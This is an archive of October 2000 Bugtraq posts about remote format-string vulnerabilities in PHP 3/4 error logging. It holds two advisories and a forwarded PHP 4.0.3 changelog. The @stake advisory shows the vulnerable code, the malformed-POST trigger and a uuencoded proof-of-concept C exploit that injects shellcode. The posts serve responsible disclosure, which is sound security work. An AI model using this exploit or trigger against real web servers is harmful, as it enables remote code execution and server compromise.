5582370 2000-10-12 07:24 /87 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13233>
Ärende: PHP remote format string vulnerabilities
------------------------------------------------------------
From: Jouko Pynnönen <jouko@SOLUTIONS.FI>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10010120221430.14548-100000@shell.solutions.fi>
OVERVIEW
PHP is a commonly used HTML-embedded scripting language. Format
string vulnerabilities exist in the error logging routines of PHP
versions 3 and 4, allowing remote users to execute arbitrary code
under the web server's user id. A web server having PHP installed and
one or more PHP scripts is vulnerable to the problem if error logging
is enabled in php.ini. Also any PHP script using the "syslog" command
of PHP may be vulnerable, regardless of error logging.
The problem was tested on a Red Hat Linux system having Apache and
mod_php3 installed. Error logging was enabled in php.ini. With a test
exploit program, a shellcode could be run remotely under the web
server user id, which is typically not the root user.
BUG DETAILS
In main.c, function php3_log_error():
#if HAVE_SYSLOG_H
if (!strcmp(php3_ini.error_log, "syslog")) {
syslog(LOG_NOTICE, log_message);
return;
} else {
#endif
log_file = fopen(php3_ini.error_log, "a");
if (log_file != NULL) {
fprintf(log_file, log_message);
...
This one is a classical "format bug". There are a couple of other
similar fprintf() calls in the same function, as well as Apache API
function calls to aplog_error() and log_error() which all use the
log_message as a format string.
The message can be trivially generated with any php3 script on a web
server, for example by sending a POST request with content-type
"multipart/form-data" but without a boundary string. A shellcode and
other data may be placed in the error message. The error message can
be generated without the script actually wanting to process any POST
data.
Another format bug in functions/syslog.c, function php3_syslog:
syslog(priority->value.lval, message->value.str.val);
The "syslog" command of PHP takes two parameters, the
priority/facility number and the message itself. The message is
always passed to libc syslog() as a format string. Thus any program
doing syslogging may be vulnerable to a format string attack; details
depend on the script in question.
The code fragments above are taken from PHP 3 sources, but the
vulnerabilities exist in PHP version 4 too.
SOLUTION
Authors of PHP have been contacted (two weeks ago) and they have
released new versions of the software. OS vendors have been contacted
as well and they have, or will release fix packages shortly. A
temporary workaround is to disable error logging in php.ini, and
disable any PHP scripts that use the syslog command.
A new fixed version of PHP 4 is downloadable at
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz
CREDITS
Vulnerability discovered by: Jouko Pynnönen <jouko@solutions.fi>
--
Jouko Pynnönen Online Solutions Ltd Secure your Linux -
jouko@solutions.fi http://www.secmod.com
(5582370) ------------------------------------------(Ombruten)
5582432 2000-10-12 08:28 /127 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13234>
Ärende: PHP security improved -- Fwd: [ANNOUNCE] PHP 4.0.3 released
------------------------------------------------------------
From: Viktors Rotanovs <Viktors@ROTANOVS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <00101200531704.00802@viktors.riga.nu>
---------- Forwarded Message ----------
Subject: [ANNOUNCE] PHP 4.0.3 released
Date: Thu, 12 Oct 2000 00:42:33 +0200
From: Zeev Suraski <zeev@zend.com>
To: php-general@lists.php.net,
php-announce@lists.php.net
PHP 4.0.3 has been released. 4.0.3 is mostly a security-oriented
maintenance release, therefore it's *strongly* recommended for all
users of PHP to upgrade to it.
Source:
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz
Win32 binaries:
http://www.php.net/do_download.php?download_file=php-4.0.3-Win32.zip
You'd notice that the 4.0.3 Win32 distribution is beefed up with a
lot of loadable modules. The extensive build is courtesy of Daniel
Beulshausen - thanks!
The full list of changes is enclosed.
Zeev
11 Oct 2000, Version 4.0.3
- Fixed a possible crash in -a interactive mode (Zeev, Zend Engine)
- Added mysql_escape_string() (Peter A. Savitch and & Brian Wang)
- Fixed many possible crash bugs with improper use of the printf()
family of
functions (Andi)
- Fixed a problem that allowed users to override admin_value's and
admin_flag's (Zeev)
- Fixed PostgreSQL module to work when the link handle is omitted
(Zeev)
- Fixed returning of empty LOB fields in OCI8. (Thies)
- Added Calendar module to default Win32 build (Andi)
- Added FTP module to default Win32 build (Andi)
- Fixed crash in the POSIX getrlimit() function (alex@zend.com)
- Fixed dirname() under certain conditions (Andi)
- Added --with-imap-ssl to support SSL'ized imap library in RH7 and
others
(Rasmus)
- Fixed possible crash bug in parse_url() (Andi)
- Added support for trans sid under Win32 (Daniel)
- IPv6 support in fopen (Stig Venaas)
- Added the shmop extension. It allows more general ways of shared memory
access. (thanks to Ilia Alshanestky <iliaa@home.com> and Slava Poliakov
<slavapl@mailandnews.com> (Derick)
- Added the ability for CURLOPT_POSTFIELDS to accept an associative
array of
HTTP POST variables and values. (Sterling)
- Added the CURLOPT_HTTPHEADER option to curl_setopt(). (Sterling)
- Added the curl_error() and curl_errno() functions. (Sterling)
- Changed ext/db not to be enabled by default (Jani)
- Fixed building Apache SAPI module on SCO UnixWare (Sascha)
- Fixed writing empty session sets to shared memory
(tcarroll@chc-chimes.com)
- Added support for BSD/OS make (Sascha)
- Added improved URL rewriter (Sascha)
- Fixed readdir_r() use on Solaris (Sascha)
- Improved HTTP headers for private-caching (jon@csh.rit.edu, Sascha)
- Added new function session_cache_limiter (jon@csh.rit.edu, Sascha)
- Added ftp_exec to the ftp functions (thanks to <jhennebicq@i-d.net>)
(Derick)
- PEAR: add last executed query as debug info in DB errors (Stig)
- PEAR: allow multiple modes in PEAR_Error (Stig)
- Made the Sybase CT module thread safe (Zeev)
- Added second argument to array_reverse() that indicatese whether
the original array keys should be preserved. (Andrei)
- Clean up htmlspecialchars/htmlentities inconsistencies. (Rasmus)
- PEAR: renamed DB_GETMODE_* to DB_FETCHMODE_*, added setFetchMode()
in DB_common to set the default mode, added some MySQL tests (Stig)
- Made eval() and several other runtime-evaluated code portions
report the
nature and location of errors more accurately (Stas)
- Added an optional parameter to wordwrap that cuts a string if the
length of
a word is longer than the maximum allowed. (Derick)
- Added functions pg_put_line and pg_end_copy (Dirk Elmendorf)
- Added second parameter for parse_str to save result (John Bafford)
- Fixed bug with curl places extra data in the
output. (medvitz@medvitz.net)
- Added the pathinfo() function. (Sterling)
- Updated sybase_ct module and its sybase_query to use high
performance API.
(Joey)
- Added a more configurable error reporting interface to DB. (Stig)
- Added is_uploaded_file() and move_uploaded_file() (Zeev)
- Added several directives to php.ini - post_max_size, file_uploads,
display_startup_errors - see php.ini-dist for further information
(Zeev)
- Worked around a bug in the libc5 implementation of readdir() (Stas)
- Fixed some potential OpenBSD and NetBSD crash bugs when opening
files.
(Andi) - Added EscapeShellArg() function (Rasmus)
- Added a php.ini option session.use_trans_sid to enable/disable
trans-sid.
(Sterling)
- Added the Sablotron extension for XSL parsing. (Sterling)
- Fixed a bug in checkdate() which caused < 1 years to be valid (Jani)
- Added support for an optional output handler function for output
buffering. This enables transparent rendering of XML through XSL,
transparent compression, etc. (Zeev)
- Added support for user defined 'tick' callback functions. This helps
emulate background processing. (Andrei)
- Fixed problem with having $this as the XML parser object. (Andrei)
- Internal opened_path variable now uses the Zend memory manager so
that full
paths of files won't leak on unclean shutdown (Andi)
- Removed support of print $obj automatically calling the __string_value()
method. Instead define yourself a method such as toString() and use
print $obj->toString() (Andi, Zend Engine)
--
Zeev Suraski <zeev@zend.com>
http://www.zend.com/
-- PHP Announcements Mailing List (http://www.php.net/) To
unsubscribe, e-mail: php-announce-unsubscribe@lists.php.net For
additional commands, e-mail: php-announce-help@lists.php.net To
contact the list administrators, e-mail: php-list-admin@lists.php.net
-------------------------------------------------------
--
Best Wishes,
Viktors Rotanovs
I create websites that attract more clients. http://riga.nu/
Riga Latvia +371, Phone/Fax 7377-472, GSM 9173-000
(5582432) ------------------------------------------(Ombruten)
5587155 2000-10-12 21:13 /353 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13244>
Ärende: @stake Advisory: PHP3/PHP4 Logging Format String Vulnerability (A
------------------------------------------------------------
101200-1) From: "@stake Advisories" <advisories@ATSTAKE.COM> To:
BUGTRAQ@SECURITYFOCUS.COM Message-ID:
<C5119AD12E92D311928E009027DE4CCA5548F9@boddington.atstake.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
We contacted the PHP team on 10/3/2000 concerning this problem. We wanted
to hold off releasing our advisory until a fix was available for PHP3
since some users may not be able to easily upgrade to PHP4. Fixes for
PHP3 and PHP4 are now available. We are aware that Jouko Pynnönen
<jouko@solutions.fi> found this problem independantly but chose to release
before the PHP3 fix was available.
Weld Pond
@stake, Inc.
www.atstake.com
Security Advisory
Advisory Name: PHP3/PHP4 Logging Format String Vulnerability
Release Date: 10/12/2000
Application: PHP3 and PHP4
Platform: All platforms
Severity: Attacker can remotely compromise PHP3 enabled webservers,
and most likely PHP4 enabled webservers
Author: DilDog [dildog@atstake.com]
Vendor Status: Fix for PHP3 and PHP4 available
Web: www.atstake.com/research/advisories/2000/a101200-1.txt
Executive Summary
PHP versions 3 and 4 are vulnerabled to format string attacks
in their logging functions. This can lead to remote takeover of PHP
enabled webservers that have logging enabled.
Overview
PHP versions 3 and 4 employ a set of logging functions that,
through an improper use of 'syslog()' and 'vsnprintf()', render it
vulnerable to attack. The attacker could utilize this vulnerability
to remotely compromise any PHP enabled webserver that has logging to
either syslog or to a file enabled in the 'php.ini' configuration
file. This particular attack does not affect PHP installations that
do not log PHP errors and warnings.
Detailed Description
PHP versions 3 and 4 utilize the following functions:
main/php_syslog.h:
#define php_syslog syslog
main/main.c:
void php_log_err(char *log_message)
{
...
php_syslog(LOG_NOTICE, log_message)
...
fprintf(log_file, "[%s] ", error_time_str);
fprintf(log_file, log_message);
fprintf(log_file, "\n");
...
}
Hence, if the "log_message" contains any user input at all,
then it creates a vulnerability. An exploitable condition is
presented in the following code for PHP 3, since 'php3_error' calls
down to php_log_err if logging is enabled:
main/main.c:
PHPAPI void php3_error(int type, const char *format,...) {
...
char log_buffer[1024];
snprintf(log_buffer, 1024, "PHP 3 %s: %s in %s on
line %d", error_type_str, buffer, filename,
php3_get_lineno(GLOBAL(current_lineno)));
php3_log_err(log_buffer);
...
}
functions/post.c:
static char *php3_getpost(pval *http_post_vars)
{
...
php3_error(E_WARNING, "File Upload Error: No MIME boundary
found");
php3_error(E_WARNING, "There should have been a
\"boundary=3Dsomething\" in the Content-Type string");
php3_error(E_WARNING, "The Content-Type string was: \"%s\"",
ctype);
...
}
PHP4 looks vulnerable as well, but in a different place. When
a file is uploaded via a post operation, if the file name contains
format string exploit code, and the file size is larger than the
maximum file size for uploads, the following code is executed. Note
that this possible problem has not been tested by @stake, but the
code path looks problematic:
static void php_mime_split(char *buf, int cnt, char *boundary, zval
*array_ptr)
{
...
php_error(E_WARNING, "Max file size exceeded - file [%s] not
saved", namebuf);
...
}
Temporary Solution
Turn off logging on PHP3 and PHP4 by going into your 'php.ini'
file and changing the following settings to:
log_errors = Off
Vendor Response
A fixed version of PHP4 is available:
http://www.php.net/do_download.php?download_file=php-4.0.3.tar.gz
A fixed version of PHP3 is available:
http://www.php.net/distributions/php-3.0.17.tar.gz
Proof-of-Concept Code
This proof of concept code creates a zero length file in
/tmp/BADPHP. Use like this:
gcc badphp.c && ./a.out <ip address of webserver> <port of webserver>
<php file path>
(php file path must point to an existing php file, such as /foo.php3)
begin 644 badphp.c
M(VEN8VQU9&4\<W1D:6\N:#X*(VEN8VQU9&4\<WES+W1Y<&5S+F@^"B-I;F-L
M=61E/'-Y<R]S;V-K970N:#X*(VEN8VQU9&4\;F5T:6YE="]I;BYH/@HC:6YC
M;'5D93QA<G!A+VEN970N:#X*(VEN8VQU9&4\;F5T9&(N:#X*"B-D969I;F4@
M0E-)6D4@,34T.0HC9&5F:6YE($)51D9%4EI/3D4@,3(X"@II;G0@;6%I;BAI
M;G0@87)G8RP@8VAA<B`J87)G=EM=*0I["B`@:6YT(&DL<W1A<G0L8V]U;G0[
M"B`@:6YT('-T86-K;&]C/3!X0D9&1D1!-C`["B`@:6YT(',["B`@1DE,12`J
M9CL*("!F9%]S970@<F9D<SL*("!S=')U8W0@:&]S=&5N="`J:&4["B`@<W1R
M=6-T('-O8VMA9&1R7VEN('-A9&1R.PH@(&-H87(@<W!L;VET6T)325I%73L*
M("!C:&%R(&9I;&5;73TB+W1M<"]"04102%`B.PH@(&-H87(@8SL*"B`@:68H
M87)G8R$]-2D@>PH@("`@<')I;G1F*"(E<R`\861D<CX@/'!O<G0^(#QO9F9S
M970^(#QP:'`@9FEL92!N86UE/EQN(BQA<F=V6S!=*3L*("`@('!R:6YT9B@B
M;V9F<V5T/3`@9F]R(&UO<W0@<WES=&5M<RY<;B(I.R`*("`@(')E='5R;B`P
M.PH@('T*"B`@+RHJ*B!B=6EL9"!E>'!L;VET('-T<FEN9R`J*BHO"B`@"B`@
M+RH@=W)I=&4@8F%D(&9O<FUA="!S=')I;F<L(&%D9&EN9R!I;B!O9F9S970@
M*B\*("!S;G!R:6YT9BAS<&QO:70L<VEZ96]F*'-P;&]I="DL"@D@("`B0V]N
M=&5N="U4>7!E.FUU;'1I<&%R="]F;W)M+61A=&$@)24E=5@E)5@E)5@E)6AN
M(BP*"2`@(#4U.#$W("\J*V]F9G-E=#`L,2PR+#,J+R`I.PH*("`O*B!F:6QL
M('=I=&@@8G)E86MP;VEN=',@86YD(&YO<',J+PH@('-T87)T/7-T<FQE;BAS
M<&QO:70I.PH@(&UE;7-E="AS<&QO:70K<W1A<G0L,'A#0RQ"4TE:12US=&%R
M="D["B`@;65M<V5T*'-P;&]I="MS=&%R="M"549&15):3TY%*C0L,'@Y,"Q"
M549&15):3TY%*C0I.PH@('-P;&]I=%M"4TE:12TQ73TP.PH@(`H@("\J('!O
M:6YT97(@=&\@<W1A<G0@;V8@8V]D92`H<W1A8VML;V,K-"D@*B\*("!C;W5N
M=#U"549&15):3TY%.PH@(&9O<BAI/3`[:3QC;W5N=#MI*RLI('L*("`@('5N
M<VEG;F5D(&EN="!V86QU93US=&%C:VQO8RLT*RAC;W5N="HT*3L*("`@(&EF
M*"AV86QU928P>#`P,#`P,$9&*3T],"D@=F%L=65\/3!X,#`P,#`P,#0["B`@
M("!I9B@H=F%L=64F,'@P,#`P1D8P,"D]/3`I('9A;'5E?#TP>#`P,#`P-#`P
M.PH@("`@:68H*'9A;'5E)C!X,#!&1C`P,#`I/3TP*2!V86QU97P],'@P,#`T
M,#`P,#L*("`@(&EF*"AV86QU928P>$9&,#`P,#`P*3T],"D@=F%L=65\/3!X
M,#0P,#`P,#`["B`@("`J*'5N<VEG;F5D(&EN="`J*28H<W!L;VET6W-T87)T
M*VDJ-%TI/79A;'5E.PH@('T*("!S=&%R="L]0E5&1D526D].12HT*C(["@H@
M("\J*BH@8G5I;&0@<VAE;&QC;V1E("HJ*B\*"B`@<W!L;VET6W-T87)T*S!=
M/3!X.3`[("\J(&YO<"`J+PH@(`H@('-P;&]I=%MS=&%R="LQ73TP>$)!.R`O
M*B!M;W8@961X+"`H;F]T(#!X,4(V("AA*W)W*2D@*B\*("!S<&QO:71;<W1A
M<G0K,ET],'@T.3L*("!S<&QO:71;<W1A<G0K,UT],'A&13L*("!S<&QO:71;
M<W1A<G0K-%T],'A&1CL*("!S<&QO:71;<W1A<G0K-5T],'A&1CL*"B`@<W!L
M;VET6W-T87)T*S9=/3!X1C<[("\J(&YO="!E9'@@*B\*("!S<&QO:71;<W1A
M<G0K-UT],'A$,CL*"B`@<W!L;VET6W-T87)T*SA=/3!X0CD[("\J(&UO=B!E
M8W@L("AN;W0@,'@T,"`H3U]#4D5!5"DI("HO"B`@<W!L;VET6W-T87)T*SE=
M/3!X0D8["B`@<W!L;VET6W-T87)T*S$P73TP>$9&.PH@('-P;&]I=%MS=&%R
M="LQ,5T],'A&1CL*("!S<&QO:71;<W1A<G0K,3)=/3!X1D8["B`@"B`@<W!L
M;VET6W-T87)T*S$S73TP>$8W.R`O*B!N;W0@96-X("HO"B`@<W!L;VET6W-T
M87)T*S$T73TP>$0Q.PH@(`H@('-P;&]I=%MS=&%R="LQ-5T],'A%.#L@+RH@
M8V%L;"!E:7`K-"`K(&EN8R!E87@@*&]V97)L87!P:6YG*2`J+PH@('-P;&]I
M=%MS=&%R="LQ-ET],'A&1CL@"B`@<W!L;VET6W-T87)T*S$W73TP>$9&.R`*
M("!S<&QO:71;<W1A<G0K,3A=/3!X1D8[(`H@('-P;&]I=%MS=&%R="LQ.5T]
M,'A&1CL@"B`@<W!L;VET6W-T87)T*S(P73TP>$,P.PH@('-P;&]I=%MS=&%R
M="LR,5T],'@U0CL@+RH@<&]P(&5B>"`J+PH@('-P;&]I=%MS=&%R="LR,ET]
M,'@V03L@+RH@<'5S:"`R,B`H;V9F<V5T('1O(&5N9"!O9B!S<&QO:70@*&9I
M;&5N86UE*2D@*B\*("!S<&QO:71;<W1A<G0K,C-=/3!X,38["B`@<W!L;VET
M6W-T87)T*S(T73TP>#4X.R`O*B!P;W`@96%X("HO"B`@<W!L;VET6W-T87)T
M*S(U73TP>#`S.R`O*B!A9&0@96)X+&5A>"`J+PH@('-P;&]I=%MS=&%R="LR
M-ET],'A$.#L*("`*("!S<&QO:71;<W1A<G0K,C==/3!X,S,[("\J('AO<B!E
M87@L96%X("HO"B`@<W!L;VET6W-T87)T*S(X73TP>$,P.PH*("!S<&QO:71;
M<W1A<G0K,CE=/3!X.#@[("\J(&UO=B!B>71E('!T<B!;96)X*S$Q72QA;"`J
M+PH@('-P;&]I=%MS=&%R="LS,%T],'@T,SL*("!S<&QO:71;<W1A<G0K,S%=
M/3!X,$(["B`*("!S<&QO:71;<W1A<G0K,S)=/3!X.#,[("\J(&%D9"!E87@L
M-2`J+PH@('-P;&]I=%MS=&%R="LS,UT],'A#,#L*("!S<&QO:71;<W1A<G0K
M,S1=/3!X,#4["@H@('-P;&]I=%MS=&%R="LS-5T],'A#1#L@+RH@:6YT(#@P
M("AO<&5N*2`J+PH@('-P;&]I=%MS=&%R="LS-ET],'@X,#L*"B`@<W!L;VET
M6W-T87)T*S,W73TP>#,S.R`O*B!X;W(@96%X+&5A>"`J+PH@('-P;&]I=%MS
M=&%R="LS.%T],'A#,#L*(`H@('-P;&]I=%MS=&%R="LS.5T],'@T,#L@+RH@
M:6YC(&5A>"`J+PH@(`H@('-P;&]I=%MS=&%R="LT,%T],'A#1#L@+RH@:6YT
M(#@P("A?97AI="D@*B\*("!S<&QO:71;<W1A<G0K-#%=/3!X.#`["B`@"B`@
M+RH@861D(&9I;&5N86UE('1O('1O=6-H("HO"B`@<W1R;F-P>2@F<W!L;VET
M6W-T87)T*S0R72QF:6QE+'-T<FQE;BAF:6QE*2D["@H@("\J*BH@<V5N9"!E
M>'!L;VET('-T<FEN9R`J*BHO"B`*("`O*B!C<F5A=&4@<V]C:V5T("HO"B`@
M<SUS;V-K970H4$9?24Y%5"Q33T-+7U-44D5!32Q)4%!23U1/7U1#4"D["B`@
M:68H<SPP*2!["B`@("!P<FEN=&8H(F-O=6QD;B=T(&-R96%T92!S;V-K970N
M7&XB*3L*("`@(')E='5R;B`P.PH@('T@"B`*("`O*B!C;VYN96-T('1O('!O
M<G0@*B\*("!M96US970H)G-A9&1R+#`L<VEZ96]F*'-A9&1R*2D["B`@<V%D
M9'(N<VEN7V9A;6EL>3U!1E])3D54.PH@('-A9&1R+G-I;E]P;W)T/6AT;VYS
M*&%T;VDH87)G=ELR72DI.PH@(&AE/6=E=&AO<W1B>6YA;64H87)G=ELQ72D[
M"B`@:68H:&4]/4Y53$PI('L*("`@('!R:6YT9B@B:6YV86QI9"!H;W-T;F%M
M92Y<;B(I.PH@('T*("!M96UC<'DH)BAS861D<BYS:6Y?861D<BYS7V%D9'(I
M+&AE+3YH7V%D9')?;&ES=%LP72QS:7IE;V8H<W1R=6-T(&EN7V%D9'(I*3L*
M"B`@:68H8V]N;F5C="AS+"AS=')U8W0@<V]C:V%D9'(@*BDF<V%D9'(L<VEZ
M96]F*'-A9&1R*2DA/3`I('L*("`@('!R:6YT9B@B8V]U;&1N)W0@8V]N;F5C
M="Y<;B(I.PH@("`@<F5T=7)N(#`["B`@?0H@(`H@("\J(&9D;W!E;B!T:&4@
M<V]C:V5T('1O('5S92!S=')E86T@9G5N8W1I;VYS("HO"B`@9CUF9&]P96XH
M<RPB=R(I.PH@(&EF*&8]/4Y53$PI('L*("`@(&-L;W-E*',I.PH@("`@<')I
M;G1F*")C;W5L9&XG="!F9&]P96X@<V]C:V5T+EQN(BD["B`@("!R971U<FX@
M,#L*("!]"@H@("\J('!U="!T:&4@<&]S="!R97%U97-T('1O('1H92!S;V-K
M970@*B\*("!F<')I;G1F*&8L(E!/4U0@)7,@2%144"\Q+C!<;B(L87)G=ELT
M72D["B`@9G!U=',H<W!L;VET+&8I.PH@(&9P=71C*"=<;B<L9BD["B`@9G!U
M=&,H)UQN)RQF*3L*("!F9FQU<V@H9BD["@H@("\J(&-L;W-E('1H92!S;V-K
M970@*B\*("!F8VQO<V4H9BD["B`@8VQO<V4H<RD["@H@(')E='5R;B`P.PI]
("@H*"@H*"@H`
`
end
For more advisories: http://www.atstake.com/research/advisories/
PGP Key: http://www.atstake.com/research/pgp_key.asc
Copyright 2000 @stake, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0
iQA/AwUBOeXDs1ESXwDtLdMhEQKhfQCg9vH3t5G8VsJfm87jcfFd1+wUwSUAoPK0
Nuo1xrPafrB4/ktOyIvMJzzf
=URKs
-----END PGP SIGNATURE-----
(5587155) ------------------------------------------(Ombruten)